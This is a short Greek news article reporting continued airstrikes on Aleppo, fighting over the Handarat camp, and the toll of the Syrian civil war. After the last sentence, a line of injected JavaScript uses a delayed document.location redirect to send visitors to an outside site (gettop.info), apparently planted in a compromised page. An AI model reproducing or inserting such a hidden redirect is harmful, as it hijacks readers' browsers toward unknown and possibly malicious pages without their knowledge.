Χωρίς τέλος οι βομβαρδισμοί στο Χαλέπι

0
4

 

Μαχητικά αεροσκάφη βομβαρδίζουν και πάλι σήμερα έναν καταυλισμό στο βόρειο Χαλέπι, καθώς οι δυνάμεις του συριακού καθεστώτος και των ανταρτών δίνουν σκληρή μάχη για τον έλεγχό του, την ώρα που συνεδριάζει το Συμβούλιο Ασφαλείας του ΟΗΕ με θέμα τη συριακή κρίση.

Τα αεροπλάνα σφυροκοπούν επίσης συνοικίες της πόλης, ισοπεδώνοντας ολόκληρα κτίρια, όπως ανέφεραν κάτοικοι της περιοχής και πηγές των ανταρτών.

Περισσότεροι από 250.000 άνθρωποι παραμένουν εγκλωβισμένοι στον πολιορκημένο, ανταρτοκρατούμενο τομέα και εντείνονται οι ανησυχίες για την κλιμάκωση της βίας μετά την κατάρρευση της εκεχειρίας, την περασμένη εβδομάδα.

Ο συριακός στρατός, με τον οποίο συνεργάζονται παραστρατιωτικοί υποστηριζόμενοι από το Ιράν, μια ομάδα της σιιτικής Χεζμπολάχ του Λιβάνου και μια παλαιστινιακή πολιτοφυλακή, παραδέχτηκε ότι οι αντάρτες ξαναπήραν το Χανταράτ.

«Ο συριακός στρατός βάζει στο στόχαστρο τις θέσεις των ενόπλων οργανώσεων στον καταυλισμό Χανταράτ«, είπε μια στρατιωτική πηγή, σύμφωνα με τα κρατικά μέσα ενημέρωσης.

Η μάχη στου Χαλέπι είναι ίσως η μεγαλύτερη που έχει δοθεί μέχρι σήμερα στον εμφύλιο πόλεμο που έχει στοιχίσει τη ζωή σε εκατοντάδες χιλιάδες ανθρώπους.

Στο μεταξύ σε 11 εκατομμύρια ανέρχονται οι άνθρωποι που έχουν αναγκαστεί να εγκαταλείψουν τα σπίτια τους. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here